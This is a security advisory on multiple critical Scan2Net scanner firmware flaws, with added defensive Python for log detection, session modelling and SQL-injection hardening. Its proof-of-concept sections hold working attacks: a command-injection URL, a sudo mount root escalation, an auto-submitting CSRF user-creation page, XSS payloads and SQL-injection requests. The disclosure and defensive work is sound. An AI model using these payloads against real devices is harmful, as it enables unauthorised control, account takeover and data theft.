SEC Consult SA-20241204-0 :: Multiple Critical Vulnerabilities in Image Access Scan2Net (14 CVE)

Full Disclosure mailing list archives


From: SEC Consult Vulnerability Lab via Fulldisclosure <fulldisclosure () seclists org>
Date: Wed, 4 Dec 2024 09:52:38 +0000

SEC Consult Vulnerability Lab Security Advisory < 20241204-0 >
=======================================================================
              title: Multiple Critical Vulnerabilities
            product: Image Access Scan2Net
 vulnerable version: Firmware <=7.40, <=7.42, <7.42B
                     (depending on the vulnerability)
      fixed version: mostly fixed in v7.42B
         CVE number: CVE-2024-28138, CVE-2024-28139, CVE-2024-28140
                     CVE-2024-28141, CVE-2024-28142, CVE-2024-28143
                     CVE-2024-28144, CVE-2024-28145, CVE-2024-28146
                     CVE-2024-47946, CVE-2024-47947, CVE-2024-36498
                     CVE-2024-36494, CVE-2024-50584
             impact: critical
    vendor homepage: https://www.imageaccess.de/?page=SoftwareScan2Net&lang=en
       advisory URL: https://r.sec-consult.com/imageaccess
              found: 2023-06-22
                 by: Daniel Hirschberger (Office Bochum)
                     Tobias Niemann (Office Bochum)
                     SEC Consult Vulnerability Lab

                     An integrated part of SEC Consult, an Eviden business
                     Europe | Asia

                     https://www.sec-consult.com

=======================================================================

Vendor description:
-------------------
"Scan2Net® - The Ultimate Scanning Technology
- Better than just another client software package
- Integrates into existing networks without additional drivers or PCs
- Unrivaled performance, highest security, low connectivity cost

The Scan2Net® platform is the technological foundation of all WideTEK® and
Bookeye® scanners from Image Access. It replaces the proprietary scanner drivers
and software that traditional scanners require with the fastest common,
nonproprietary connection available: TCP/IP over Ethernet. With network
interface speeds much higher than USB or SCSI, Scan2Net devices are able to
reach unrivaled performance at very low connectivity cost. The Linux based
operating system is dedicated to scanner specific imaging and mechanical control
tasks, further maximizing scanning speeds and performance."

Source: https://www.imageaccess.de/?page=SoftwareScan2Net&lang=en


Business recommendation:
------------------------
The vendor provides a firmware update to version 7.42B which should be installed
immediately. SEC Consult could only partially verify the correction of all
identified vulnerabilities. Some vulnerabilities have not been fixed by the
vendor as the risk was accepted.

SEC Consult highly recommends performing a thorough security review of the
product, conducted by security professionals, to identify and resolve potential
further security issues.


Vulnerability overview/description:
-----------------------------------
1) OS Command Injection (CVE-2024-28138)
An unauthenticated attacker with network access to the scanner can execute any
system command via the "msg_events.php" script as the www-data user.

2) Privilege Escalation (CVE-2024-28139)
The www-data user can elevate its privileges because sudo is configured to allow
the execution of the mount command as root without a password. Therefore, the
privileges can be escalated to the root user.

3) Violation of Least Privilege Principle (CVE-2024-28140)
The scanner boots into a kiosk mode by default and opens the Scan2Net interface
in a browser window. This browser is run with the permissions of the root user.
There are also several other applications running as root, some of them
self-developed, but those could not be exploited at first glance.

4) Cross-Site Request-Forgery (CSRF) (CVE-2024-28141)
The web application is not protected against cross-site request forgery attacks.
Therefore, an attacker can trick users into performing actions on the
application when they visit an attacker-controlled website or click on a
malicious link.

5) Stored Cross-Site-Scripting (XSS) (CVE-2024-28142, CVE-2024-47947)
Due to missing input sanitization, an attacker can perform cross-site-scripting
attacks and run arbitrary Javascript in the browser of other users.

6) Insecure Password Change Function (CVE-2024-28143)
The password change function does not require the current password, which makes
the application vulnerable to account takeover, especially if combined with the
CSRF vulnerability.

7) Broken Access Control (CVE-2024-28144)
Due to missing access control on the reboot and shutdown functions, an attacker
can perform a denial-of-service attack against the application.
Furthermore, an attacker who can spoof the IP address and the User-Agent of a
logged-in user can take over the session because of flaws in the self-developed
session management.

8) Unauthenticated SQL Injection (CVE-2024-28145)
An unauthenticated attacker can perform an SQL injection by accessing the
dbconnector.php file and supplying malicious GET parameters.

9) Hard-coded Credentials (CVE-2024-28146)
The application uses several hard-coded credentials for protecting the firmware
update file and the installed database server.


Update 2024-04-02:
------------------
ImageAccess GmbH provided us with an internet-facing test device and we spent a
short time verifying the vulnerabilities in their latest firmware (7.40), which
according to the vendor should fix the security issues.

Unfortunately, most of them are still present and new ones have been discovered.

In short:

1) OS Command Injection (CVE-2024-28138, CVE-2024-47946)
Fixed, but a new RCE vulnerability requiring a session as Poweruser has been
discovered; updated PoC below. The second RCE issue is tracked as CVE-2024-47946.

2) Privilege Escalation (CVE-2024-28139)
Still an issue.

3) Violation of Least Privilege Principle (CVE-2024-28140)
Still an issue.

4) Cross-Site Request-Forgery (CSRF) (CVE-2024-28141)
Fixed. The introduced "session_id" cookie is protected with the "SameSite=Strict"
cookie flag. This prevents CSRF attacks.

5) Stored Cross-Site-Scripting (XSS) (CVE-2024-28142, CVE-2024-47947, CVE-2024-36498)
Original issues are fixed (CVE-2024-28142, CVE-2024-47947), but we discovered a
new one, updated PoC below. The new XSS is tracked as CVE-2024-36498.

6) Insecure Password Change Function (CVE-2024-28143)
Fixed. The password change function now requires the current password.

7) Broken Access Control (CVE-2024-28144)
Still an issue.
If two users access the web interface from the same IP they are logged in as the
other user. Updated PoC below.

8) Unauthenticated SQL Injection (CVE-2024-28145, CVE-2024-50584)
Original issue fixed, but a new blind SQLi as Poweruser has been found, updated
PoC below. The new SQLi is tracked as CVE-2024-50584.

9) Hard-coded Credentials (CVE-2024-28146)
Still an issue, credentials can be found in different files.


Update 2024-10-14:
------------------
ImageAccess GmbH provided us with an internet-facing test device and we spent a
short time verifying the vulnerabilities in their latest firmware (7.42), which
according to the vendor should fix the submitted critical security issues.

1) OS Command Injection (CVE-2024-28138, CVE-2024-47946)
The new RCE vulnerability is fixed now.

2) Privilege Escalation (CVE-2024-28139)
Still an open issue. The risk has been accepted by the vendor because the other
critical issues are fixed and shell access is not easily possible anymore.

3) Violation of Least Privilege Principle (CVE-2024-28140)
The kiosk browser is no longer running as root but many other custom services
still are.

4) Cross-Site Request-Forgery (CSRF) (CVE-2024-28141)
Fixed.

5) Stored Cross-Site-Scripting (XSS) (CVE-2024-28142, CVE-2024-47947, CVE-2024-36498, CVE-2024-36494)
The third XSS (CVE-2024-36498) has also been fixed. We discovered a new XSS
vulnerability in the login page which only works if the target user is _not_
already logged in, which makes it ideal for login form phishing attempts.
The new XSS is tracked as CVE-2024-36494.

6) Insecure Password Change Function (CVE-2024-28143)
Fixed. The password change function now requires the current password.

7) Broken Access Control (CVE-2024-28144)
Still an issue.

8) Unauthenticated SQL Injection (CVE-2024-28145, CVE-2024-50584)
The blind SQLi as Poweruser has been fixed.

9) Hard-coded Credentials (CVE-2024-28146)
Mostly fixed. Many credentials can be found in different files. The most
problematic 'support' user had their password rotated and it was not immediately
obvious where it is stored now.


Proof of concept:
-----------------
1) OS Command Injection (CVE-2024-28138, CVE-2024-47946)
An unauthenticated attacker with network access can execute arbitrary commands
by visiting the following URL. The HTTP GET parameter "data" is not properly
sanitized:

https://$SCANNER/class/msg_events.php?action=writemsgfifo&data=;$COMMAND

For example, the following URL can be used to display information about the
current user of the web server:

https://$SCANNER/class/msg_events.php?action=writemsgfifo&data=;id

The following image shows the output of the command:
<01_os_command_injection.png>

Update 2024-04-02:
------------------
The second issue is now tracked as CVE-2024-47946.
The OS command injection as shown above is no longer possible in the new
firmware version 7.40. Another possibility to gain remote code execution
has been identified if the attacker has access to a valid Poweruser session.
Specifically crafted valid PNG files with injected PHP content can be uploaded
as desktop backgrounds or lock screens. After the upload, the PHP script is
available in the web root. The PHP script executes once the uploaded file is
accessed. This allows the execution of arbitrary PHP code and OS commands on
the device as "www-data".

<01_os_command_injection_new.png>


2) Privilege Escalation (CVE-2024-28139)
By executing the command "sudo -l" as the www-data user, it is apparent that
this user can be used to escalate privileges to root, as shown in the following
figure:

<02-sudo-L.png>

The following commands can be executed to elevate to root privileges, as shown
in the following figure:
> sudo mount -o bind /usr/bin/bash /usr/bin/mount
> sudo mount

<02-sudo_mount.png>


3) Violation of Least Privilege Principle (CVE-2024-28140)
Many processes are running with root privileges which violates the principle of
Least Privilege.

This can be confirmed by running "ps aux" as the root user and observing the
output:

root  /opt/s2n/bin/S2NBrowserV7 --no-sandbox StartUpSelection.html x:0 y:800 w:1920 h:1080
root   \_ /usr/lib/x86_64-linux-gnu/qt5/libexec/QtWebEngineProcess --type=zygote --no-sandbox --lang=en-US
root       \_ /usr/lib/x86_64-linux-gnu/qt5/libexec/QtWebEngineProcess --type=zygote --no-sandbox --lang=en-US
[...]

Apart from the browser, the following binaries also run with root permissions:
vsftpd, smbd, wsdd.py, X11, OpenBox, and the s2n-specific binaries (copyd,
s2ncopy, ocrd, imaged, camd_ucc1, admind, s2nwdd, ledd, wt36keyb, ...).


4) Cross-Site Request-Forgery (CSRF) (CVE-2024-28141)
The application offers no protection against Cross-Site Request-Forgery.
An attacker can therefore forge malicious links to reset the admin password or
create new users.

4.1) Reset Admin Password
The following link resets the password of the administrator to the value
"CSRF2YOU!". The password is base64-encoded (Q1NSRjJZT1Uh).

https://$SCANNER/cgi/admin.cgi?-rsetpass+-aaction+-1Q1NSRjJZT1Uh+-2adm

4.2) Register a new user
The following code can be hosted on a malicious page controlled by the attacker.
When a user who is logged in as administrator is lured by the attacker to visit
this page, a new user "SECtest" with the password "CSRF2YOU!" is automatically
created:

<html>
  <body>
    <form action="https://$SCANNER/cgi/upuserdata.cgi" method="POST">
      <input type="hidden" name="groupid" value="0" />
      <input type="hidden" name="username" value="SECtest" />
      <input type="hidden" name="pw1" value="CSRF2YOU!" />
      <input type="hidden" name="pw2" value="CSRF2YOU!" />
      <input type="submit" value="Submit request" />
    </form>
    <script>document.forms[0].submit();</script>
  </body>
</html>

The following image shows the result:
<04_register_user.png>


5) Stored Cross-Site-Scripting (XSS) (CVE-2024-28142, CVE-2024-47947, CVE-2024-36498, CVE-2024-36494)
There are at least two identified injection points:

5.1) Scenario 1: Stored XSS via User Settings -> File Name (CVE-2024-28142)
a. Login as Scan2Net User.
b. Navigate to User Settings -> File Name (https://$SCANNER/cgi/uset.cgi?-cfilename)
c. Edit the "Wildcard Character" %2 setting to contain the following payload and
   reference it in the file name:

   > <script>alert(document.location)</script>

<05-1_xss_scenario_1.png>

d. The JavaScript payload will be saved automatically.
e. The payload will be triggered on each visit of the User Settings -> File Name
   page.

It is also executed when an admin visits the following page:
https://$SCANNER/cgi/uset.cgi?-cfilename

<05-2_xss_scenario_1_triggered.png>


This attack can even be performed without being logged in because the affected
functions are not fully protected. Without logging in, only the file name
parameter of the "Default" User can be changed. However, the wildcards can be
changed without authentication. To inject the payload, the following two
requests have to be submitted.

I. Changing the file name of the "Default" user to scan_xss%2.pdf:
https://$SCANNER/cgi/chopt.cgi?uset+save_filename+scan_xss%252.pdf+filename+Default

II. Changing the Wildcard %2 to the JavaScript payload:
https://$SCANNER/cgi/chopt.cgi?fileabb+fileabb_customvalue2+%3Cscript%3Ealert(document.location)%3C/script%3E


5.2) Scenario 2: Stored XSS via the ScanWizard Disclaimer (CVE-2024-47947)
The "Edit Disclaimer Text" function of the configuration menu is also vulnerable.
Only the users Poweruser and Admin can use this function which is available at
the URL
https://$SCANNER/cgi/admin.cgi?-rdisclaimer+-apre

The JavaScript can be inserted as shown in this image:
<05-3_xss_scenario_2_insertion.png>


Afterwards, this change has to be applied by clicking on the "Apply" button.
From now on the payload will be executed every time the ScanWizard is loaded.
The URL of the ScanWizard interface is: https://$SCANNER/ScanWizard.html

<05-4_xss_scenario_2_trigger_browser.png>

This also includes the ScanWizard which is displayed in the Kiosk-mode browser
which is present on the physical touch-enabled display of the scanner itself.

<05-4_xss_scenario_2_trigger_touch.png>


Update 2024-04-02:
------------------
The third issue is now tracked as CVE-2024-36498.
The following text can be inserted as Poweruser into the disclaimer to
exploit this issue:

%3c%53%63%72%69%70%74%3e%61%6c%65%72%74%28%31%29%3c%2f%53%63%72%69%70%74%3e

This is the payload <Script>alert(1)</Script> URL-encoded.


Update 2024-10-14:
------------------
The fourth issue is now tracked as CVE-2024-36494.
A new reflected XSS, which only works on unauthenticated targets, has been found:

https://$SCANNER/cgi/slogin.cgi?-tsetup+-uuser%22%20onfocus%3ddocument.body.innerHTML%2B%3dlocation.hash,document.body.innerHTML%2b%3ddocument.body.innerText%20autofocus%20b%3d#<img/src="x"onerror="alert(1)">

Update 2024-11-12:
------------------
The vendor tells us that the latest identified XSS issue should be fixed with
version 7.42B.


6) Insecure Password Change Function (CVE-2024-28143)
The password change function does not require the user to enter the old password
in order to set a new one. As explained in the CSRF finding (4.1), an attacker
can use this to forcefully set a new password for a user without knowing the
old one. The following link sets the password of the user who clicks on it to
the value "CSRF2YOU!", which is "Q1NSRjJZT1Uh" when base64-encoded:

https://$SCANNER/cgi/admin.cgi?-rsetpass+-aaction+-1Q1NSRjJZT1Uh+-2adm


7) Broken Access Control (CVE-2024-28144)
7.1) Reboot and Shutdown functions
The functions "reboot" and "shutdown" can be called without any authorization
checks or authentication:
https://$SCANNER/cgi/shutdown.cgi
https://$SCANNER/cgi/reboot.cgi

The authorization checks are also missing on the User Settings -> File Name and
the dbconnector as described in chapter 5.1 and 8 respectively.
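For defenders, the endpoints that sections 1, 5.1, 7.1 and 8 show to be reachable without a login can be watched for in the scanner's (or a fronting reverse proxy's) access log. The following detection script is an added example, not part of the advisory or of the vendor's software; the log lines are constructed in combined log format, and the label names and regular expressions are my own.

```python
import re
from typing import Dict, List, Optional
from urllib.parse import unquote, urlsplit

# Apache/nginx "combined" log format; the sample lines further down are constructed.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" '
    r'(?P<status>\d{3}) \S+ "(?P<referer>[^"]*)" "(?P<ua>[^"]*)"$'
)
SHELL_META_RE = re.compile(r"[;|&`$]")                                   # section 1: data=;$COMMAND
HTML_RE = re.compile(r"<|javascript:|\bon\w+=", re.I)                    # section 5.1: wildcard payload
SQLI_RE = re.compile(r"\b(union|select|sleep|benchmark)\b|'|--", re.I)  # section 8: UNION / quotes


def query_param(query: str, name: str) -> Optional[str]:
    """Decoded value of the first name=value pair; splits on '&' only, so a ';'
    inside the value (the injection separator from section 1) is preserved."""
    for pair in query.split("&"):
        key, _, val = pair.partition("=")
        if key == name:
            return unquote(val)
    return None


def classify(target: str) -> List[str]:
    """Map one request target (path plus query) to the advisory findings it matches."""
    parts = urlsplit(target)
    path = parts.path.lower()
    raw_query = unquote(parts.query)  # '+' stays literal: chopt.cgi uses it as a separator
    labels: List[str] = []
    # 1) msg_events.php?action=writemsgfifo&data=;<cmd> (CVE-2024-28138)
    if path.endswith("/class/msg_events.php") and query_param(parts.query, "action") == "writemsgfifo":
        if SHELL_META_RE.search(query_param(parts.query, "data") or ""):
            labels.append("cmd_injection")
    # 5.1) unauthenticated wildcard change that carries markup (CVE-2024-28142)
    if path.endswith("/cgi/chopt.cgi") and raw_query.startswith("fileabb+") and HTML_RE.search(raw_query):
        labels.append("xss_wildcard")
    # 7.1) reboot/shutdown reachable without authentication (CVE-2024-28144)
    if path.endswith(("/cgi/shutdown.cgi", "/cgi/reboot.cgi")):
        labels.append("unauth_power_control")
    # 8) dbconnect.php needs no login; SQL keywords or quotes in the query mean injection
    if path.endswith("/class/dbconnect.php"):
        labels.append("sqli_dbconnect" if SQLI_RE.search(raw_query) else "dbconnect_access")
    return labels


def scan(log_text: str) -> List[Dict[str, object]]:
    """One finding per combined-format line that matches at least one rule."""
    findings: List[Dict[str, object]] = []
    for line in log_text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue  # not in combined format; skip rather than guess
        labels = classify(m["target"])
        if labels:
            findings.append({"ip": m["ip"], "ua": m["ua"], "target": m["target"], "labels": labels})
    return findings


# Constructed sample: four requests that replay the advisory's PoCs, then two benign ones.
SAMPLE_LOG = """\
203.0.113.5 - - [04/Dec/2024:10:01:02 +0000] "GET /class/msg_events.php?action=writemsgfifo&data=;id HTTP/1.1" 200 512 "-" "curl/8.4.0"
203.0.113.5 - - [04/Dec/2024:10:01:09 +0000] "GET /cgi/chopt.cgi?fileabb+fileabb_customvalue2+%3Cscript%3Ealert(document.location)%3C/script%3E HTTP/1.1" 200 88 "-" "curl/8.4.0"
198.51.100.7 - - [04/Dec/2024:10:02:30 +0000] "GET /cgi/reboot.cgi HTTP/1.1" 200 0 "-" "Mozilla/5.0"
203.0.113.5 - - [04/Dec/2024:10:03:41 +0000] "GET /class/dbconnect.php?action=getdbvalue&search=singlemode&table=user_touchscreen&field=configuration_name%20UNION%20ALL%20SELECT%20@@version--%20-&value=ScanWizard HTTP/1.1" 200 27 "-" "curl/8.4.0"
192.0.2.10 - - [04/Dec/2024:10:04:00 +0000] "GET /ScanWizard.html HTTP/1.1" 200 4096 "-" "Mozilla/5.0"
192.0.2.10 - - [04/Dec/2024:10:04:05 +0000] "GET /class/msg_events.php?action=writemsgfifo&data=hello HTTP/1.1" 200 12 "-" "Mozilla/5.0"
"""

if __name__ == "__main__":
    for finding in scan(SAMPLE_LOG):
        print(finding["ip"], finding["labels"], finding["target"])
```

Any hit on dbconnect.php, shutdown.cgi or reboot.cgi from an address that never authenticated is worth an alert on its own, since the advisory states these need no login on the affected firmware.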


7.2) Broken Session Management
Scan2Net implements a custom algorithm for the session management.
The algorithm is implemented the following way:

> SID1="$(/opt/s2n/bin/hide -s -e -i "$REMOTE_ADDR:$HTTP_USER_AGENT" -p $HOSTNAME)"

The result is stored in the database as the current session ID. On each request
to Scan2Net, SID1 is recalculated from the request headers and compared to the
session ID stored in the database. This also means that only one user can be
logged in at any time. Furthermore, an attacker who is able to spoof the IP
address of a victim and knows the User-Agent that was used to log in can take
over the victim's session.

Update 2024-04-02:
------------------
The session management is still broken.
Start two browsers of your choice (this example uses Chrome and Firefox).
Browse to https://$SCANNER_IP/cgi/config.cgi in both browsers. Notice that
you are not logged in in either of them and your "login level" is "Default".
Log in as Poweruser in Chrome. Refresh the page in Firefox and notice that your
login level now displays "Poweruser".

Browse to https://$SCANNER/cgi/slogin.cgi?-tsetup+-uPoweruser in Firefox
and click on "Edit Disclaimer Text". You will get the following error message:

<07-1_edit_disclaimer.png>
<07-2_authentication_error.png>

In Firefox browse to https://$SCANNER_IP/ScanWizard.html,
then https://$SCANNER_IP/cgi/setupmenu.cgi and click on "Edit Disclaimer Text"
once more. This time you can edit the disclaimer.
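To make the consequence of this design concrete, the following Python model is an added example, not code from the advisory or from Image Access. Since /opt/s2n/bin/hide is not public, an HMAC keyed with the hostname stands in for it (an assumption; the flaw does not depend on the primitive), and the addresses, user agents and hostname are constructed.

```python
import hashlib
import hmac
import secrets
from typing import Dict, Optional, Tuple

HOSTNAME = "widetek-lab"  # constructed stand-in for the $HOSTNAME key material


def derived_sid(remote_addr: str, user_agent: str, hostname: str = HOSTNAME) -> str:
    """Model of SID1 = hide(REMOTE_ADDR:HTTP_USER_AGENT, key=HOSTNAME).

    HMAC-SHA256 is assumed in place of the real hide tool. Whatever the primitive,
    every input is chosen by or trivially known to the client, so two clients that
    present the same address and User-Agent are indistinguishable to the server.
    """
    msg = f"{remote_addr}:{user_agent}".encode()
    return hmac.new(hostname.encode(), msg, hashlib.sha256).hexdigest()


class DerivedSessionStore:
    """Section 7.2 design: one stored SID, recomputed from request headers on every hit."""

    def __init__(self) -> None:
        self.current_sid: Optional[str] = None
        self.level = "Default"

    def login(self, remote_addr: str, user_agent: str, level: str) -> None:
        # Overwrites whatever session existed before: only one login at a time.
        self.current_sid = derived_sid(remote_addr, user_agent)
        self.level = level

    def level_for(self, remote_addr: str, user_agent: str) -> str:
        # No cookie is involved: matching headers alone grant the stored level.
        if self.current_sid == derived_sid(remote_addr, user_agent):
            return self.level
        return "Default"


class RandomSessionStore:
    """Hardened design: an unguessable per-login token kept server side and sent
    as a Secure, HttpOnly, SameSite=Strict cookie (the flag the 7.40 fix introduced)."""

    def __init__(self) -> None:
        self.sessions: Dict[str, str] = {}

    def login(self, level: str) -> str:
        token = secrets.token_urlsafe(32)  # 256 bits from the OS CSPRNG
        self.sessions[token] = level
        return token

    def level_for(self, cookie: Optional[str]) -> str:
        return self.sessions.get(cookie or "", "Default")


def shared_address_demo() -> Tuple[str, str, str, str]:
    """Two users behind one NAT address with the same browser build (constructed)."""
    ua = "Mozilla/5.0 (X11; Linux x86_64) Chrome/120.0"
    derived = DerivedSessionStore()
    derived.login("203.0.113.10", ua, "Poweruser")
    colliding = derived.level_for("203.0.113.10", ua)  # never logged in, yet Poweruser
    neighbour = derived.level_for("203.0.113.11", ua)  # different address: Default
    hardened = RandomSessionStore()
    token = hardened.login("Poweruser")
    return colliding, neighbour, hardened.level_for(token), hardened.level_for(None)


def single_session_demo() -> Tuple[str, str]:
    """A second login from elsewhere silently logs the first user out."""
    ua = "curl/8.4.0"
    derived = DerivedSessionStore()
    derived.login("198.51.100.7", ua, "Poweruser")
    derived.login("198.51.100.8", ua, "Admin")
    return derived.level_for("198.51.100.7", ua), derived.level_for("198.51.100.8", ua)
```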


8) Unauthenticated SQL Injection (CVE-2024-28145, CVE-2024-50584)
An unauthenticated attacker can reach the database connector at the following URL:
https://$SCANNER/class/dbconnect.php

The connector accepts several query parameters:
> action, search, table, field, value

Of those, the parameters search, table, field, and value are vulnerable to SQL
injection. For example, an SQL injection can be performed on the parameter
"field" with the UNION keyword. The following request returns the version of the
SQL database server in use by union-selecting "@@version":

http://$SCANNER/class/dbconnect.php?action=getdbvalue&search=singlemode&table=user_touchscreen&field=configuration_name%20UNION%20ALL%20SELECT%20@@version--%20-&value=ScanWizard

The web server responds with:

> HTTP/1.1 200 OK
> […]
> 10.3.38-MariaDB-0+deb10u1

The database is accessed with the rights of the user "s2n".

Update 2024-04-02:
------------------
The second issue is now tracked as CVE-2024-50584.
The injection point shown above has been fixed in the new firmware (7.40),
but a new exploitable injection point was discovered in template_io.php.
An attacker with an active session as Poweruser can access the following URL:
https://$SCANNER/class/template_io.php

The PHP script processes the following query parameters:
> action, table, templates
The templates parameter is vulnerable to blind boolean-based SQL injection. The
SQL syntax must be injected inside the JSON syntax of the templates parameter.
As a short proof of concept, the following three requests can be sent:

https://$SCANNER/class/template_io.php?action=export&table=printer&templates={"0":"default"}
https://$SCANNER/class/template_io.php?action=export&table=printer&templates={"0":"default'+AND+1337=1336--+A"}
https://$SCANNER/class/template_io.php?action=export&table=printer&templates={"0":"default'+AND+1337=1337--+A"}

For the 1st (no injection) and 3rd (true condition) requests the server responds
with an identical ZIP file:

> HTTP/1.1 200 OK
> […]
> Content-Length: 1699
> PK[…]

Only the response to the 2nd request (false condition) differs in length and
content. This indicates that the injected SQL is processed by the database:

> HTTP/1.1 200 OK
> […]
> Content-Length: 1268
> PK[…]

The vulnerability was successfully exploited to exfiltrate data from the
connected database. As before, the database is accessed with the db user "s2n".
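The following Python snippet is an added example, not the scanner's PHP. It assumes the query shape SELECT <search> FROM <table> WHERE <field> = '<value>' behind dbconnect.php?action=getdbvalue (the advisory shows the request, not the source), uses an in-memory SQLite table standing in for MariaDB (so sqlite_version() replaces @@version), and puts the concatenating version beside the fix: an allow-list for identifiers, which cannot be bound as parameters, plus a bound parameter for the data value.

```python
import sqlite3
from typing import Dict, List, Set, Tuple

# Table and column names come from the advisory's request; the rows are constructed.
def make_db() -> sqlite3.Connection:
    con = sqlite3.connect(":memory:")
    con.execute("CREATE TABLE user_touchscreen (configuration_name TEXT, singlemode TEXT)")
    con.executemany("INSERT INTO user_touchscreen VALUES (?, ?)",
                    [("ScanWizard", "touch_default"), ("CopyMode", "touch_copy")])
    return con


def getdbvalue_vulnerable(con: sqlite3.Connection, search: str, table: str,
                          field: str, value: str) -> List[Tuple]:
    """Assumed pre-7.40 behaviour: every parameter is pasted into the statement,
    so "field" can terminate the WHERE clause and append a UNION of its own."""
    sql = f"SELECT {search} FROM {table} WHERE {field} = '{value}'"
    return con.execute(sql).fetchall()


# Identifiers must be checked against a fixed allow-list; only "value" is real data.
ALLOWED: Dict[str, Set[str]] = {"user_touchscreen": {"configuration_name", "singlemode"}}


def getdbvalue_hardened(con: sqlite3.Connection, search: str, table: str,
                        field: str, value: str) -> List[Tuple]:
    """Allow-listed identifiers plus a bound parameter for the data value."""
    columns = ALLOWED.get(table)
    if columns is None or search not in columns or field not in columns:
        raise ValueError("table or column not in allow-list")
    sql = f'SELECT "{search}" FROM "{table}" WHERE "{field}" = ?'
    return con.execute(sql, (value,)).fetchall()


def version_leak_demo() -> Dict[str, object]:
    """Replays the advisory's UNION request (section 8) against the toy database."""
    con = make_db()
    injected_field = "configuration_name UNION ALL SELECT sqlite_version()-- -"
    leaked = getdbvalue_vulnerable(con, "singlemode", "user_touchscreen", injected_field, "ScanWizard")
    try:
        getdbvalue_hardened(con, "singlemode", "user_touchscreen", injected_field, "ScanWizard")
        hardened = "accepted"
    except ValueError:
        hardened = "rejected"
    return {
        "leaked": leaked,
        # The single returned row is the DB engine version, not a configuration value.
        "is_real_version": leaked == [(sqlite3.sqlite_version,)],
        "hardened": hardened,
    }


if __name__ == "__main__":
    print(version_leak_demo())
```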


9) Hard-coded Credentials (CVE-2024-28146)
After obtaining root access to the scanner, the system could be examined for
hard-coded credentials. The credentials found are used to encrypt config files
during backup and to decrypt new firmware during an update, and some of the
listed passwords allow a direct connection to the scanner's database server.

| File                                | Usage                         | Username | Password      |
| ----------------------------------- | ----------------------------- | -------- | ------------- |
| /opt/s2n/www/cgi/infoio.cgi         | Encryption of exported config | -        | !Ba[REDACTED] |
| /opt/s2n/www/cgi/sysupd-1           | Encryption of firmware update | -        | Gle[REDACTED] |
| /opt/s2n/www/cgi/sysupd-2           | Encryption of firmware update | -        | Gli[REDACTED] |
| /opt/s2n/www/cgi/sysupd-3           | Encryption of firmware update | -        | Bet[REDACTED] |
| /opt/s2n/www/cgi/sysupd-7           | Encryption of firmware update | -        | 201[REDACTED] |
| /opt/s2n/www/class/LocaleImport.php | login for database            | support  | HDD[REDACTED] |
| /opt/s2n/www/class/DBmysqli.php     | login for database            | s2n      | fsc[REDACTED] |
| /opt/s2n/www/class/dbconnect.php    | login for database            | mysql    | MK2[REDACTED] |


Vulnerable / tested versions:
-----------------------------
The following version was tested; it was the latest version available at the
time of the test in 2023:
* Firmware 7.31L on a WideTEK 36CL-600 Scanner

All Scan2Net versions before 7.40, as used in WideTEK and Bookeye scanners, are
affected.

SEC Consult was given access to a patched scanner device with firmware 7.40 by
the vendor in March 2024. A brief verification of the fixes showed that most
security issues were still present in that version.

Furthermore, the most recent firmware version 7.42 was rechecked in October
2024. Most critical security issues have been fixed, but some issues are still
open.


Vendor contact timeline:
------------------------
2023-06-22: Penetration test at our customer is done, we offer to start the
            responsible disclosure process with the vendor.
            Customer wants to do the responsible disclosure process themselves.
2023-07-10: We ask if there is an update from the vendor;
            Customer informs us that there is no update yet.
2023-07-10: Customer informs us that the vendor is cooperative and working on a
            timeline for the remediation of the vulnerabilities.
2023-09-18: Because of an unrelated project we ask the customer if we should
            start a responsible disclosure process for that other project;
            Customer wants us to do the responsible disclosure process because
            they are currently lacking the resources to do it themselves.
            This also includes yet another, unrelated, older project;
            We ask if we should also start a responsible disclosure process for
            <this> project.
2023-09-22: Customer gives us permission for this project as well.
2023-11-28: Contacting vendor via support () imageaccess de; no response.
2023-12-18: Contacting vendor again via support () imageaccess de
2023-12-21: Support requests device name, serial number and firmware version.
2023-12-22: We provide the device name and firmware version, don't have serial
            number; no response from vendor.
2024-01-17: Asking vendor again where to send the advisory, if encryption is
            supported; no response.
2024-02-07: Submitting this case to German CERT-Bund/BSI via CVD including
            advisory details.
2024-02-09: Response from CERT-Bund, trying to establish contact with vendor.
2024-02-19: Response from CERT-Bund, vendor provides version 7.40 which fixes
            the issues.
2024-02-19: Asking whether the advisory was sent to the vendor by CERT-Bund,
            trying to clarify how to verify the fix and which devices and
            firmware versions are affected. Preparing CVE reservation.
2024-03-04: Vendor responds to CERT-Bund and keeps SEC Consult in CC.
            Users can download the firmware themselves via the download page.
2024-03-05: Asking about affected devices (Scan2net WideTEK, Bookeye, etc).
            Reserving CVE numbers and sending them to vendor.
2024-03-12: Detailed vendor response, providing internet-facing test device
            to verify the latest firmware version 7.40.
2024-03-25: Briefly verifying latest firmware version, most security issues
            still present. Updating security advisory.
2024-04-02: Sending updated advisory to vendor, asking for a meeting. No response.
2024-04-12: Asking whether email was received and to schedule a meeting.
2024-04-16: Productive conference call, further explained open security issues,
            updated firmware version scheduled for mid May.
2024-05-23: Asking for a status update. No response.
2024-06-11: Asking for a status update again.
            Vendor: New version should be available by end of the week.
2024-06-18: Vendor informs us that new version is available and should fix
            all reported issues.
2024-09-26: Requesting access to test system again to verify fix (delay because
            of longer vacation period)
2024-09-26: Quick vendor response, providing access to test system again.
2024-09-27: Apologizing for delay because of vacations/absences, recheck will be
            performed soon.
2024-09-27: Vendor provides updated version information, latest version is
            currently v7.42.
2024-10-14: Recheck of latest firmware version.
2024-10-15: Informing vendor about the open issues, providing current draft advisory.
            Asking about next steps/accepted risks.
2024-10-28: Asking for a status update.
2024-11-11: Asking for a status update.
2024-11-12: Vendor tells us that 7.42B should fix the newest XSS.
            We state that we no longer have capacities for further rechecks.
2024-11-29: Sending latest advisory draft to vendor, proposing release date for 2024-12-04;
            Vendor accepts the publication date and mentions that they
            want to release a bugfix for issue #7 this week.
2024-12-04: Public disclosure of security advisory.


Solution:
---------
The vendor provides a firmware update to version 7.42B which can be downloaded
via the vendor's customer server portal:
https://www.imageaccess.de/?page=SupportPortal&lang=en

This version fixes most of the identified issues. Only a few issues remain, for
which the vendor has either accepted the risk or plans a patch in the future.


Workaround:
-----------
None


Advisory URL:
-------------
https://r.sec-consult.com/imageaccess


~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

SEC Consult Vulnerability Lab
An integrated part of SEC Consult, an Eviden business
Europe | Asia

About SEC Consult Vulnerability Lab
